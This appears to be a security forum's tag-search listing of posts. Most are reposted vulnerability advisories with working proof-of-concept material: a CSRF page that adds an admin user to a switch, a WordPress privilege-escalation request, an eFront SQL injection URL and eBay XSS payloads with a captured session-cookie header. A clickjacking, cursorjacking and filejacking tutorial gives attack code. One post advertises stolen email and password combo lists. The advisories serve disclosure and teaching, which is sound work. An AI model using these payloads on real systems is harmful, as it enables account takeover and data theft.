Jump to content

Search the Community

Showing results for tags 'user'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Occupation


Interests


Biography


Location

  1. Just a moment... username:adytzu98
  2. Aveam de parsat dimineata asta texturile tweeturilor rezultate in urma interogarii API-ului public de la Twitter. Ele vin ca si text simplu dar pentru prezentarea/afisarea lor pe o pagina probabil vreti sa adaugati hyperlink pe hashtag-uri sau user mentions. Doua librarii ce v-ar putea ajuta: 1. Python - https://github.com/edburnett/twitter-text-python Daca vreti sa faceti magia in backend 2. JS - https://github.com/twitter/twitter-text/tree/master/js Daca vreti doar la nivel de frontend.
  3. Advisory: Alcatel-Lucent OmniSwitch Web Interface Cross-Site Request Forgery During a penetration test, RedTeam Pentesting discovered a vulnerability in the management web interface of an Alcatel-Lucent OmniSwitch 6450. The management web interface has no protection against cross-site request forgery attacks. This allows specially crafted web pages to change the switch configuration and create users, if an administrator accesses the website while being authenticated in the management web interface. Details ======= Product: Alcatel-Lucent OmniSwitch 6450, 6250, 6850E, 9000E, 6400, 6855, 6900, 10K, 6860 Affected Versions: All Releases: AOS 6.4.5.R02 AOS 6.4.6.R01 AOS 6.6.4.R01 AOS 6.6.5.R02 AOS 7.3.2.R01 AOS 7.3.3.R01 AOS 7.3.4.R01 AOS 8.1.1.R01 Fixed Versions: - Vulnerability Type: Cross-site request forgery Security Risk: medium Vendor URL: http://enterprise.alcatel-lucent.com/?product=OmniSwitch6450&page=overview Vendor Status: notified Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2015-004 Advisory Status: published CVE: CVE-2015-2805 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2805 Introduction ============ "The Alcatel-Lucent OmniSwitch 6450 Gigabit and Fast Ethernet Stackable LAN Switches are the latest value stackable switches in the OmniSwitch family of products. The OmniSwitch 6450 was specifically built for versatility offering optional upgrade paths for 10 Gigabit stacking, 10 Gigabit Ethernet uplinks, from Fast to Gigabit user ports (L models) and Metro Ethernet services." (from the vendor's homepage) More Details ============ The management web interface of the OmniSwitch 6450 can be accessed using a web browser via HTTP. The web interface allows creating new user accounts, in this case an HTTP request like the following is sent to the switch: POST /sec/content/sec_asa_users_local_db_add.html HTTP/1.1 Host: 192.0.2.1 [...] Cookie: session=sess_15739 Content-Type: application/x-www-form-urlencoded Content-Length: 214 EmWeb_ns:mip:2.T1:I1=attacker &EmWeb_ns:mip:244.T1:O1=secret &EmWeb_ns:mip:246.T1:O2=-1 &EmWeb_ns:mip:248.T1:O3= &EmWeb_ns:mip:249.T1:O4=1 &EmWeb_ns:mip:250.T1:O5=4 This request creates a user "attacker" with the password "secret". All other parameters are static. All POST parameters can be predicted by attackers This means that requests of this form can be prepared by attackers and sent from any web page the user visits in the same browser. If the user is authenticated to the switch, a valid session cookie is included in the request automatically, and the action is performed. In order to activate the new user for the web interface it is necessary to enable the respective access privileges in the user's profile. This can also be done via the web interface. Then the HTTP POST request looks like the following: POST /sec/content/os6250_sec_asa_users_local_db_family_mod.html HTTP/1.1 Host: 192.0.2.1 [...] Cookie: session=sess_15739 Content-Type: application/x-www-form-urlencoded Content-Length: 167 EmWeb_ns:mip:2.T1:I1=attacker &EmWeb_ns:mip:4.T1:O1= &EmWeb_ns:mip:5.T1:O2= &EmWeb_ns:mip:6.T1:O3=4294967295 &EmWeb_ns:mip:7.T1:O4=4294967295 This request sets all access privileges for the user "attacker" and is again completely predictable. Proof of Concept ================ Visiting the following HTML page will create a new user via the switch's management web interface, if the user is authenticated at the switch: ------------------------------------------------------------------------ <html> <head> <title>Alcatel-Lucent OmniSwitch 6450 create user via CSRF</title> </head> <body> <form action="http://192.0.2.1/sec/content/sec_asa_users_local_db_add.html" method="POST" id="CSRF" style="visibility:hidden"> <input type="hidden" name="EmWeb_ns:mip:2.T1:I1" value="attacker" /> <input type="hidden" name="EmWeb_ns:mip:244.T1:O1" value="secret" /> <input type="hidden" name="EmWeb_ns:mip:244.T1:O2" value="-1" /> <input type="hidden" name="EmWeb_ns:mip:244.T1:O3" value="" /> <input type="hidden" name="EmWeb_ns:mip:244.T1:O4" value="1" /> <input type="hidden" name="EmWeb_ns:mip:244.T1:O5" value="4" /> </form> <script> document.getElementById("CSRF").submit(); </script> </body> </html> ------------------------------------------------------------------------ Workaround ========== Disable the web interface by executing the following commands: AOS6: no ip service http no ip service secure-http AOS 7/8: ip service http admin-state disable If this is not possible, use a dedicated browser or browser profile for managing the switch via the web interface. Fix === Upgrade the firmware to a fixed version, according to the vendor the fixed versions will be available at the end of July 2015. Security Risk ============= If attackers trick a logged-in administrator to visit an attacker-controlled web page, the attacker can perform actions and reconfigure the switch. In this situation an attacker can create an additional user account on the switch for future access. While a successful attack results in full access to the switch, the attack is hard to exploit because attackers need to know the IP address of the switch and get an administrative user to access an attacker-controlled web page. The vulnerability is therefore rated as a medium risk. Timeline ======== 2015-03-16 Vulnerability identified 2015-03-25 Customer approves disclosure to vendor 2015-03-26 CVE number requested 2015-03-31 CVE number assigned 2015-04-01 Vendor notified 2015-04-02 Vendor acknowledged receipt of advisories 2015-04-08 Requested status update from vendor, vendor is investigating 2015-04-29 Requested status update from vendor, vendor is still investigating 2015-05-22 Requested status update from vendor 2015-05-27 Vendor is working on the issue 2015-06-05 Vendor notified customers 2015-06-08 Vendor provided details about affected versions 2015-06-10 Advisory released RedTeam Pentesting GmbH Source
  4. SQL Email Pass Combo List Check Paste Url | SPaste super combo list user pass Check Paste Url | SPaste
  5. # Exploit Title: WordPress WP Membership plugin [Privilege escalation] # Contact: https://twitter.com/panVagenas # Vendor Homepage: http://wpmembership.e-plugins.com/ # Software Link: http://codecanyon.net/item/wp-membership/10066554 # Version: 1.2.3 # Tested on: WordPress 4.2.2 # CVE: CVE-2015-4038 1 Description Any registered user can perform a privilege escalation through `iv_membership_update_user_settings` AJAX action. Although this exploit can be used to modify other plugin related data (eg payment status and expiry date), privilege escalation can lead to a serious incident because the malicious user can take administrative role to the infected website. 2 Proof of Concept * Login as regular user * Sent a POST request to `http://example.com/wp-admin/admin-ajax.php` with data: `action=iv_membership_update_user_settings&form_data=user_id%3D<yourUserID>%26user_role%3Dadministrator` 3 Actions taken after discovery Vendor was informed on 2015/05/19. 4 Solution No official solution yet exists. Surs?: http://dl.packetstormsecurity.net/1505-exploits/wpmembership-escalate.txt
  6. The St. Louis Federal Reserve today sent a message to those it serves alerting them that in late April 2015 attackers succeeded in hijacking the domain name servers for the institution. The attack redirected Web searches and queries for those seeking a variety of domains run by the government entity to a Web page set up by the attackers in an apparent bid by cybercrooks to hijack online communications of banks and other entities dealing with the regional Fed office. The communique, shared by an anonymous source, was verified as legitimate by a source at another regional Federal Reserve location. The notice from the St. Louis Fed stated that the “the Federal Reserve Bank of St. Louis has been made aware that on April 24, 2015, computer hackers manipulated routing settings at a domain name service (DNS) vendor used by the St. Louis Fed so that they could automatically redirect some of the Bank’s web traffic that day to rogue webpages they created to simulate the look of the St. Louis Fed’s research.stlouisfed.org website, including webpages for FRED, FRASER, GeoFRED and ALFRED.” Requests for comment from the St. Louis Fed so far have gone unreturned. It remains unclear what impact, if any, this event has had on the normal day-to-day operations of hundreds of financial institutions that interact with the regional Fed operator. The advisory noted that “as is common with these kinds of DNS attacks, users who were redirected to one of these phony websites may have been unknowingly exposed to vulnerabilities that the hackers may have put there, such as phishing, malware and access to user names and passwords.” The statement continues: “These risks apply to individuals who attempted to access the St. Louis Fed’s research.stlouisfed.org website on April 24, 2015. If you attempted to log into your user account on that date, it is possible that this malicious group may have accessed your user name and password. The St. Louis Fed’s website itself was not compromised. According to Wikipedia, the Federal Reserve Economic Data (FRED) is a database maintained by the Research division of the Federal Reserve Bank of St. Louis that has more than 247,000 economic time series from 79 sources. The data can be viewed in graphical and text form or downloaded for import to a database or spreadsheet, and viewed on mobile devices. They cover banking, business/fiscal, consumer price indexes, employment and population, exchange rates, gross domestic product, interest rates, monetary aggregates, producer price indexes, reserves and monetary base, U.S. trade and international transactions, and U.S. financial data. FRASER stands for the Federal Reserve Archival System for Economic Research, and reportedly contains links to scanned images (PDF format) of historic economic statistical publications, releases, and documents including the annual Economic Report of the President. Coverage starts with the 19th and early 20th century for some economic and banking reports. According to the Federal Reserve, GeoFred allows authorized users to create, customize, and share geographical maps of data found in FRED. ALFRED, short for ArchivaL Federal Reserve Economic Data, allows users to retrieve vintage versions of economic data that were available on specific dates in history. The St. Louis Federal Reserve is one of twelve regional Fed organizations, and serves banks located in the all of Arkansas and portions of six other states: Illinois, Indiana, Kentucky, Mississippi, Missouri and Tennessee. According to the reserve’s Web site, it also serves most of eastern Missouri and southern Illinois. No information is available at this time about the attackers involved in this intrusion, but given the time lag between this event and today’s disclosure it seems likely that it is related to state-sponsored hacking activity from a foreign adversary. If the DNS compromise also waylaid emails to and from the institution, this could be a much bigger deal. This is likely to be a fast-moving story. More updates as they become available. Source
  7. Same origin bypasses using clickjacking Clickjacking (User Interface redress attack, UI redress attack, UI redressing) is a malicious technique of tricking a web user into clicking on something different from what the user perceives they are clicking on, thus potentially revealing confidential information or taking control of their computer while clicking on seemingly innocuous web pages. It is a browser security issue that is a vulnerability across a variety of browsers and platforms. A clickjack takes the form of embedded code or a script that can execute without the user’s knowledge, such as clicking on a button that appears to perform another function. The term “clickjacking” was coined by Jeremiah Grossman and Robert Hansen in 2008. Clickjacking can be understood as an instance of the confused deputy problem, a term used to describe when a computer is innocently fooled into misusing its authority [Wikipedia]. The clickjacking attack is a common security flaw, wherein a transparent iframe and customized CSS fool a user to click on an invisible object without knowing. The following code is an example of status update: <html> <head>Status Update</head> <body> <form name="updatestatus" action="javascript: alert('Status updated')" method="POST"> <input type="hidden" name="status" value="You are my hero, blah blah blah"> <input type="hidden" name="Anticsrftoken" value"jaklgbkj4wtfgfklsafghajfnmacdnwmrauf"> <input type="submit" name="twitter" value="Update here"> </form> </body> </html> Let’s have a look at the above mentioned code. In this example, a user will see a button “update here”, and once the user clicks on the button, a prompt will come up that says “status updated”. The real page would contain a URL where those user input values are sent. When the user clicks on the submit button, the user status is updated. To exploit this, the attacker needs to frame the vulnerable site into the transparent iframe. <html> <head> <style> iframe{ filter:alpha(opacity=0); opacity:0; position:absolute; top: 250px; left: 40px; height: 300px; width: 250px; } img{ position:absolute; top: 0px; left: 0px; height: 300px; width: 250px; } </style> </head> <body> <!-- The user sees the following image--> <img src<a href="http://httpsecure.org/wp-content/uploads/2014/06/CSRF-220x170.png">="http://httpsecure.org/wp-content/uploads/2014/06/CSRF-220x170.png</a>"> <!-- but he effectively clicks on the following framed content --> <iframe src<a href="http://httpsecure.org/uid">="http://httpsecure.org/ui</a>d=145496823/status.php"></iframe> </body> </html> In the above shown code, there is no visible presence of the frame content. This way, the user won’t see iframe content, instead he will see only the mentioned image. hidden frame, the user will only see the above mentioned image instead of the application’s real content. If the user clicks on the button, the hidden HTML form loads inside the iframe and send the value. This is a simplest example of how a user can be fooled into performing unwanted actions. Even if the application relies on an Anti-CSRF token, it does not impact the delivery of the clickjacking attack. This is because the resource to be framed is loaded normally and contains a valid Anti-CSRF token. Note: Clickjacking is the perfect example of bypassing Anti-CSRF token. The above mentioned example demonstrates what is clickjacking and how it is exploited. If you need the attack to take dynamic information such as mouse movement from the target, you can throw JavaScript into the code. This enables you to get exact x and y coordinates of the current mouse position. One clickjacking aim is to ensure your target mouse is always on top of the button, so the victim will click wherever you want. Rich Lundeen and Brendan Coles created a BeEF command module implementing this very technique. Now, you have two frames, one inner and other one is an outer iframe. The inner frame gets its position updated according to the current mouse cursor position, and outer iframe loads the target origin you want to exploit with the same attack. So, this way the mouse cursor is always wherever you want. The following code uses the JQuery API to dynamically update the position of the outer frame given the current mouse coordinates: $j("body").mousemove(function(e) { $j(outerObj).css('top', e.pageY); $j(outerObj).css('left', e.pageX); }); The inner iframe style uses the opacity trick to render an invisible element: filter:alpha(opacity=0); opacity:0; The clickjacking BeEF module with the preceding HTML as the inner iframe will send all clicks to the iframe. The iframe is following the mouse movements. So, wherever the user clicks on the page, they will be clicking the status update button. The iframe is reliably following the mouse movements. The cursor is still on top of the button. When the user decides to click somewhere, the click will trigger the onClick event of the button in the framed page. As you can see in the source page of the framed page, this will result in an Alert dialog. Same origin bypasses using cursorjacking This is typically similar to the clickjacking attack, however in this issue we will focus on the mouse cursor. Good examples of cursorjacking were demonstrated by Eddy Bordi and refined by Maruz Niemietz. Cursorjacking deceives users by means of a custom cursor image, where the pointer is displayed with an offset. The displayed cursor is shifted to the right from the actual mouse position. Let’s consider the following page: <html> <head> <style type="text/css"> #c { cursor:u<a href="http://localhost/basic_cursorjacking">rl("http://localhost/basic_cursorjacking</a> /new_cursor.png"),default; } #c input{ cursor:u<a href="http://localhost/basic_cursorjacking">rl("http://localhost/basic_cursorjacking</a> /new_cursor.png"),default; } </style> </head> <body> <h1>This is an example of CursorJacking. Click on the 'b' or 'd' buttons. </h1> <div id="c"> <input type="button" value="a" onclick="alert('clicked on a')"> <input type="button" value="b" onclick="alert('clicked on b')"> <br></br> <input type="button" value="c" onclick="alert('clicked on c')"> <input type="button" value="d" onclick="alert('clicked on d')"> </div> </body> </html> You can see the mouse cursor is changed with a custom image. This contains a mouse icon that is moved to static offset on the right. Clicking the second button results in clicking the first button. In the above example, the image background is visible, however, in a real case scenario the image would be a transparent background. When the user tries to click the B and D button in the page, he would actually be clicking the button on the left of the page. This new attack vector relies on completely hiding the cursor in the body of the page and adding the following style to the body element. <body style="cursor:none"> Let’s take another example. A different cursor image is then dynamically overlaid and is associated with mousemove events. The following code gives you a demo of this technique: <html> <head><title>Advanced cursorjacking by Kotowicz & Heiderich</title> <style> body,html {margin:0;padding:0} </style> </head> <body style="cursor:none;height: 1000px;"><img style="position: absolute;z-index:1000;" id=cursor src="cursor.png" /> <div style=margin-left:300px;"> <h1>Is this a good example of cursorjacking?</h1> </div> <button style="font-size: 150%;position:absolute;top:130px;left:630px;">YES</button> <button style="font-size: 150%;position:absolute;top:130px; left:680px;">NO</button> <div style="opacity:1;position:absolute;top:130px;left:30px;"> <a href="https://twitter.com/share" class="twitter-share-button" data-via="kkotowicz" data-size="small">Tweet</a> <script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)) {js=d.createElement(s);js.id=id;js.src="//platform.twitter.com/ widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document, "script","twitter-wjs");</script> </div> <script> function shake(n) { if (parent.moveBy) { for (i = 10; i > 0; i--) { for (j = n; j > 0; j--) { parent.moveBy(0,i); parent.moveBy(i,0); parent.moveBy(0,-i); parent.moveBy(-i,0); } } } } shake(5); var oNode = document.getElementById('cursor'); var onmove = function (e) { var nMoveX = e.clientX, nMoveY = e.clientY; oNode.style.left = (nMoveX + 600)+"px"; oNode.style.top = nMoveY + "px"; }; document.body.addEventListener('mousemove', onmove, true); </script> </body> </html> Note: Mentioned code written by Kotowicz & Heiderich In this example, the mouse cursor image is replaced with a custom image. Also, the event listener is then attached to the page body, listening for mousemove events. When the user’s mouse is moved, the event triggers the listener that results in the fake mouse cursor (the visible one) moving accordingly. Clicking the YES button results in clicking the Tweet button. This technique actually originally bypassed NoScript’s ClearClick Protection. Bypass same origin policy using filejacking Filejacking allow the extrusion of directory content from the target underlying Operating System to the attacker’s server through clever UI manipulation within the browser. This result is that under certain conditions, you can download files from the target server. In order to perform this attack successfully, first the target must use Chrome, because it’s the only browser which supports directory and webkitdirectory input attributes like the following. Second, the attack relies on baiting the victim into clicking somewhere, similar to the clickjacking attack. In this scenario, the input element presented is hidden behind a button element. Kotowicz published this attack in a research paper in 2011 after analyzing the impact of delivering filejacking attack to users baited with social engineering tricks. The filejacking attack depends on the target using the operating system’s “Choose Folder” dialog box when downloading a file from the web. To perform this attack, you should attempt to trick the user into selecting a directory containing sensitive files, for instance by employing authentic-looking phishing content that demonstrates what the target will see if they select the “Download to…” button. JavaScript code will enumerate the files in the directory with the directory input attribute, and then POST each of the files back to your server. In order to exploit filejacking, you can Google it and find server and client side code for the same. Input element should have their opacity set to 0, which will be covered by the visible button element. When the victim clicks the button, they are actually clicking the input element, assuming they need to select a download destination. When the victim clicks on the input element, a download destination is chosen and the onchange event on the input element is then triggered and the malicious function will execute. This results in enumerating the files contained in the selected download destination and formatting the content using the form data object, which is extruded with a cross-origin Post XMLHttpRequest. And the enumerated directory file is uploaded to the server. FYI The origin of the two previous snippets is different, which does not prevent the attack from exploiting. The file could be extruded from the target’s OS, SOP, powered browsers such as FIREFOX, CHROME and SAFARI. In cross-origin scenarios, the browser still sees the XMLHttpRequest, even through the response cannot be read. References http://en.wikipedia.org/wiki/Clickjacking https://browserhacker.com/ Source
  8. eFront 3.6.15 Multiple SQL Injection Vulnerabilities [+] Author: Filippo Roncari | Luca De Fulgentis [+] Target: eFront [+] Version: 3.6.15 and probably lower [+] Vendor: www.efrontlearning.net [+] Accessibility: Remote [+] Severity: High [+] CVE: <requested> [+] Full Advisory: https://www.securenetwork.it/docs/advisory/SN-15-02_eFront.pdf [+] Info: f.roncari@securenetwork.it [+] Summary eFront is an open source Learning Management System (LMS) used to create and manage online training courses. From Wikipedia: “eFront is designed to assist with the creation of online learning communities while offering various opportunities for collaboration and interaction through an icon-based user interface. The platform offers tools for content creation, tests building, assignments management, reporting, internal messaging, forum, chat, surveys, calendar and others”. [+] Vulnerability Details The new_sidebar.php module, which handles the left side bar in eFront 3.6.15 default theme, is affected by two SQL injection vulnerabilities due to lack of user input sanitization. The identified issues allow unprivileged users, such as professors and students (under certain conditions), to inject arbitrary SQL statements. An attacker could exploit the vulnerabilities by sending specially crafted requests to the web application. These issues can lead to data theft, data disruption, account violation and other impacts depending on the DBMS’s user privileges. [+] Technical Details View full advisory at https://www.securenetwork.it/docs/advisory/SN-15-02_eFront.pdf for technical details and source code. [+] Proof of Concept (PoC) Any unprivileged authenticated user (e.g., student or professor) can exploit this issue, taking into account that: 1. An attacker has to access a lesson (= click on any open lesson) before executing the malicious request. 2. If logged as a Student, a potential attacker has to access a lesson for which his User Type has “content” set to hidden. 3. The default theme, or others that use the sidebar, must be in use. [!] PoC URL ----------------------------- http://target.site/www/new_sidebar.php?sbctg=lessons&new_lesson_id=null+union+select+password+from+users+where+id=1 ----------------------------- The administrator password hash is returned directly in the HTML body as part of the forum link in the sidebar menu. [!] HTTP Response ----------------------------- HTTP/1.1 200 OK Date: Thu, 09 Apr 2015 22:42:19 GMT Expires: Mon, 26 Jul 1997 05:00:00 GMT Content-Type: text/html Content-Length: 28786 [...] <div class = "menuOption" name="lessonSpecific" id="forum_a" > <table> <tr> <td> target="mainframe"> <a href = "professor.php?ctg=forum&forum=11ff89cb38b258fb50fe8672c18ff79b" <img src='themes/default/images/others/transparent.gif' class = 'handle sprite16 sprite16-message' > </a> </td> <td class = "menuListOption" > <a href = "professor.php?ctg=forum&forum=11ff89cb38b258fb50fe8672c18ff79b" title="Forum" target="mainframe">Forum</a> </td> </tr> </table> </div> [...] ----------------------------- For further details and explanations check the full advisory. [+] Disclaimer Permission is hereby granted for the redistribution of this alert, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. Surs?: http://dl.packetstormsecurity.net/1505-exploits/efront3615-sql.txt
  9. Document Title: =============== Ebay Inc Xcom #6 - Persistent POST Inject Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1227 Release Date: ============= 2015-03-24 Vulnerability Laboratory ID (VL-ID): ==================================== 1227 Common Vulnerability Scoring System: ==================================== 3.9 Product & Service Introduction: =============================== eBay Inc. is an American multinational internet consumer-to-consumer corporation, headquartered in San Jose, California. It was founded by Pierre Omidyar in 1995, and became a notable success story of the dot-com bubble; it is now a multi-billion dollar business with operations localized in over thirty countries. The company manages eBay.com, an online auction and shopping website in which people and businesses buy and sell a broad variety of goods and services worldwide. In addition to its auction-style sellings, the website has since expanded to include `Buy It Now` standard shopping; shopping by UPC, ISBN, or other kind of SKU (via Half.com); online classified advertisements online event ticket trading online money transfers and other services. (Copy of the Homepage: http://en.wikipedia.org/wiki/EBay ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Research Team discovered mutliple persistent input validation web vulnerabilities in the official Ebay Magento Web-Application (CMS & API). Vulnerability Disclosure Timeline: ================================== 2014-03-16: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH) 2014-03-17: Vendor Notification (eBay Inc - Security Research Team) 2014-04-16: Vendor Response/Feedback (eBay Inc - Security Research Team) 2015-03-19: Vendor Fix/Patch (eBay Inc - Xcom Developer Team) 2015-03-24: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Ebay Inc. Product: Ebay Inc - Official WebSite Application & API Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ Two persistent input validation web vulnerabilities has been discovered in the official Ebay Magento Web-Application (CMS & API). A persistent vulnerability allows remote attackers to inject malicious script codes on the application-side of the affected web-application. The vulnerability is located in the real `name change` (`Namens?¤nderung`) formular. The input validation of the vulnerable `first- & lastname` does not encode scipt codes. Remote attackers are able to jungle over the main website to the real name change module. In the real name change module the change the registration name with an payload. The scipt code executes in both scenarios but only in case without doublequotes it will be changed (written) in the database. The execution occurs directly in the formular and in the top user name context location. The attack vector is persistent and the request method to inject is POST. After the save of the payload it is possible to attack platform users with the manipulated profile values. The security risk of the application-side web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.9. Exploitation of the persistent web vulnerability requires a low privileged web-application user account and low user interaction. Successful exploitation results in session hijacking, persistent phishings attacks, persistent external redirect and malware loads or persistent manipulation of affected or connected module context. Vulnerable Module(s): [+] Startseite > Namens?¤nderung > [Namens?¤nderung] Vulnerable Parameter(s): [+] firstname [+] lastname Affected Domain(s): [+] ebay.com [+] namechange.ebay.* Proof of Concept (PoC): ======================= The persistent input validation web vulnerability can be exploited by remote attackers with low privileged application user account and low or medium user interaction. For security demonstration or to reproduce the vulnerability follow the provided steps and information below to continue. PoC: firstname <td><input name="firstname" style="width:500px;" value="" type="text">[PERSISTENT INJECTED SCRIPT CODE!]<img src="x" onerror="prompt(23);">????? "><img src="x" onerror="prompt(23);">">?????</td> PoC: lastname <td class="Bullets"> <input name="lastname" style="width:500px;" value="" type="text">[PERSISTENT INJECTED SCRIPT CODE!]<img src="x" onerror="prompt(23);">????? "><img src="x" onerror="prompt(23);">">?????</td> PoC: Payload(s) ">%20<img src="a" onerror="prompt(23);"> "<img src="x" onerror="prompt(document.cookie);"> --- PoC Session Logs [POST] --- Status: Aus dem Cache geladen[Aus dem Cache geladen] POST http://namechange.ebay.de/ Load Flags[LOAD_FROM_CACHE ] Gr???e des Inhalts[-1] Mime Type[unbekannt] Request Header: Host[namechange.ebay.de] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[http://namechange.ebay.de/] Cookie[ebay=%5Ea2p%3D53271e2790000000000.%5Epsi%3DAsoSnBFk*%5EsfLMD%3D1391608831%5Esbf%3D1048576%5Ecos%3D0%5Ecv%3D15555%5Esin%3Din%5Ejs%3D1%5Edv%3D53271766%5E; dp1=bpcid/223570455084ab5^a1p/0532868b5^bl/DE56e97e35^pbf/%2340000000000081a8c200000455084ab5^mpc/0%7C7753344635^kms/in56e97e35^reg/%5EflagReg%3D1%5E5c8d8e00^tzo/-3c53272545^exc/0%3A0%3A2%3A2534ea435^u1p/MjAxNC5rdW56bQ**55084ab5^u1f/Benjamin55084ab5^idm/1532865eb^; cssg=d0a729021440a62067e10281ff8b9953; s=BAQAAAUSucEmyAAWAAAEAClMoaGoyMDE0Lmt1bnptAAMAAVMoaLUwAWUAAlMoaLUjMgAGAAFTKGi1MACoAAFTKGi0MQFKABlTKGi1NTMyNzE3MzUuNzcuMS4xMS43OC4yLjAuMgAMAApTKGi1MTIyNTYzNzkwNgDuAGxTKGi1MQZodHRwOi8vbXkuZWJheS5kZS93cy9lQmF5SVNBUEkuZGxsP015ZUJheSZteWViYXk9JmN1cnJlbnRwYWdlPU15ZUJheUFkZHJlc3NlcyZzc3BhZ2VuYW1lPVNUUkslM0FNRSUzQUxOTEsHABEAD1MnG5owMDEyMTIwMTQua3Vuem0AEgAKUyhotXRlc3RDb29raWUA9AAiUyhotSQyJEFHbGR1QlhiJERkenZyQms4VzNCY25OdWo0WlpYZTAA+AAgUyhotWQwYTcyOTAyMTQ0MGE2MjA2N2UxMDI4MWZmOGI5OTUzALgADFMnGGExMzk1MDcwNzU2OjAAPQAKUyhotTIwMTQua3Vuem1FmLE+27m8Zof+2xnXOm4/NFcHGw**; nonsession=BAQAAAUSucEmyAAaAAEAAClUISrUyMDE0Lmt1bnptAWQAA1UISrUjOGEABAAKVQhKajIwMTQua3Vuem0AygAgXI0YtWM3OGNiZWY5MTQ0MGEzNTgyZGMzZDMxM2ZmYTdhM2IyAMsAAlMnHj05MgFMABlVCEq1NTMyNzE3MzUuNzcuMS4xMS43OC4zLjAuMgFNABlVCEq1NTMyNzE3MzUuNzcuMS4yLjEzNi4wLjAuMgAQAApVCEq1MjAxNC5rdW56bQAzAAlVCEq1MzQxMjgsREVVAPMAIlUISrUkMiRBR2xkdUJYYiREZHp2ckJrOFczQmNuTnVqNFpaWGUwALQAAVMn7vAwAJoAC1MpueoyMDE0Lmt1bnptbgCcADhVCEq1blkrc0haMlByQm1kajZ3Vm5ZK3NFWjJQckEyZGo2QUdrb2VuQzVlTG9RcWRqNng5blkrc2VRPT0AnQAIVQhKtTAwMDAwMDAxPfZj5+XMryhDSD8OFMa8uTDhh84*; cid=fQWajzwBNP9yfsZ3%232235704; lucky9=9735524; npii=btguid/c78cbef91440a3582dc3d313ffa7a3b255084a4a^cguid/c77cfce61440a56b23d61f96fe2e024155084a4a^; ds1=ats/0; ns1=BAQAAAUSucEmyAAaAANgAYlUISrVjOTR8NjAxXjEzOTUwNzAyNzMwMTdeTWpBeE5DNXJkVzU2YlE9PV4xXjN8Mnw2NXw1MHw1fDR8MTF8N14xXjJeNF4zXjEyXjEyXjJeMV4xXjBeMV4wXjBeMjE0NzQ5MTc3OQClAA1VCEq1MTIyNTYzNzkwNi8wO0yWn93iOeekHlbGoiabaz+eh5SQ; secses=BAQAAAUSucEmyAAaAAUsAGVUISrU1MzI3MTczNS43Ny4xLjExLjc4LjIuMC4y0niei+BIO3Yw57q3p8I3L/TNtoI*; shs=BAQAAAUSucEmyAAaAAVUADlMwUbQ1MTYyMjA1MzEwMDQsM9g7wvvmFa4cmHqHt8ygpU/NRi+3; ds2=asotr/b1Brzzzzzzzz^; dnc-ebay-de=e466b3644255378e63e0f112f81ebb0abf2ad87aad2a1286866a8d066286e5fc; ebay_dnc=u8sqslc4u5voc8605b5o7a8ag3; ssg=uld/1395070822457%5E] POST-Daten: firstname[+%22%3E%3C[MALICIOUS SCRIPT CODE!]%2823%29%3B%3E] lastname[+%22%3E%3C[MALICIOUS SCRIPT CODE!]%2823%29%3B%3E] reason_code[NCP] request_comment[+%22%3E%3C[MALICIOUS SCRIPT CODE!]%2823%29%3B%3E+++bug+bounty+program+test+-+bkm] action[proceed] Reference(s): https://scgi.ebay.de/ws/eBayISAPI.dll?ChangeRegistrationPreview https://scgi.ebay.de/ws/eBayISAPI.dll?ChangeRegistrationShow (Click Change original Registration Account "Name") https://signin.ebay.de/ws/eBayISAPI.dll?SignIn&runame=namechange1 (Login as the regular user account) https://signin.ebay.de/ws/eBayISAPI.dll?SignIn&runame=namechange2 (Exchange the user values with the name with a persistent script code payload) http://namechange.ebay.de/ (persistent execution with save in the frontend & executable script code in backend too!) Solution - Fix & Patch: ======================= The vulnerability needs to be patched in 3 different steps. 1. The input field of the original registration user name change module needs to be restricted on special characters or script codes 2. In the second step the input of the context itself needs to be encoded or secure parsed to prevent further execution of malicious injected script codes as original user name value. 3. The optional third step is to encode already injected strings as original names in the database to prevent executions after the module has been successful updated. Security Risk: ============== The security risk of the application-side input validation web vulnerability in the ebay original name change module is estimated as medium. Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of 